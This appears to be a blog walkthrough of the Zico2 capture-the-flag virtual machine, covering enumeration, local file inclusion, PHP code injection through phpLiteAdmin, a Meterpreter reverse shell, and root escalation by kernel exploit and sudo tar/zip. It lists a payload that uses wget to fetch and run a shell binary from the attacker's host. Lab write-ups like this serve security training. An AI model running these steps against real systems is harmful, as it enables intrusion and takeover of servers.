AdSense

Thursday, December 13, 2018

Zico 2


ZICO 2

 - Layout for this exercise:


1 - INTRODUCTION

 - The goal of this exercise is to develop a hacking process for the vulnerable machine Zico2.

 - Zico2 can be downloaded from here:

 https://www.vulnhub.com/entry/zico2-1,210/
- Once downloaded and extracted with VMware:



2 - ENUMERATION

 - Looking for zico2's IP:



- Scanning with Nmap:


- Dirbusting the web server we find an interesting folder dbadmin:




- Launching dirsearch.py we also discover a view.php:










- Let's explore both view.php and /dbadmin.

- Connecting to the web server:




- Scrolling down and clicking about the "tools":






- So view.php leads us to try a Local File Inclusion that can exploit a Directory Path Traversal:




- Now it's time to explore dbadmin:



- Clicking test_db.php:


- Default password for phpLiteAdmin is admin:

 https://www.acunetix.com/vulnerabilities/web/phpliteadmin-default-password/

- It is possible to create new databases:




3 - EXPLOITATION - REMOTE PHP CODE INJECTION

- Looking for phpLiteAdmin vulnerabilities there is an exploit for Remote PHP Code Injection, what allows to inject code remotely to the server:



- Reading the first lines of the 24044.txt exploit:


- Going to exploit-db:






- Following instructions let's create hack.php:









- Adding a testing table prueba:



- Entering the Default Value <?php phpinfo()?>:





- Using the LFI from view.php we can successfully run the recently created database and check that the exploit works:




- Why not taking advantage of this Remote PHP Code Injection exploit to upload a shellcode and spawn a reverse shellcode?

 - msfvenom helps to create our shellcode:
- Giving execution permissions:


- Setting a meterpreter session:



- Creating table 1 in database /usr/databases/hack.php:



- Now, it is important to analyze in detail the Default Value to be entered at Field 1:

  • system() -> executes an external program and displays the output
  • cd /tmp -> changing to writable folder /tmp
  • wget http://192.168.1.19:8000/myshell  -> transferring the exploit from Kali to Zico2
  • chmod 755 -> giving execution permissions to the exploit
  • ./myshell -> running the exploit








- view.php? helps us to run the exploit remotely:



- As a consequence a meterpreter session is achieved:






- Getting a shell:



4 - PRIVILEGE ESCALATION

 - Improving the shell:

- Let's explore two ways for Privilege Escalation:

 4.1 - Kernel exploitation

 - The kernel is vulnerable to this exploit, what allows Local Privilege Escalation:

 www.exploit-db.com/exploits/33589






- Copy+Pasting the C program vnik.c to our local machine Kali:




- Transferring vnik.c from Kali to Zico2:




- Compiling vnik.c according to the instructions:



- Running vnik a root shell is achieved:




4.2 - Abusing tar and zip

 - Listing /home/zico:


- Going to /wordpress:


- Reading wp-config.php we discover interesting credentials for user zico:


- Using these credentials:
- zico is a sudoer able to run /bin/tar and /usr/bin/zip as a root:


- tar and zip are able to run external commands supplied on the command line with the purpose of Privilege Escalation:

 http://blog.securelayer7.net/abusing-sudo-advance-linux-privilege-escalation/

 https://www.gnu.org/software/tar/manual/html_section/tar_29.html
- For instance tar can be used to spawn a root shell in this way:
- In a similar way zip can be used to spawn a root shell:




5 - CAPTURING THE FLAG

- Inside the /root  folder we can read the file flag.txt:









Posted by at
Labels: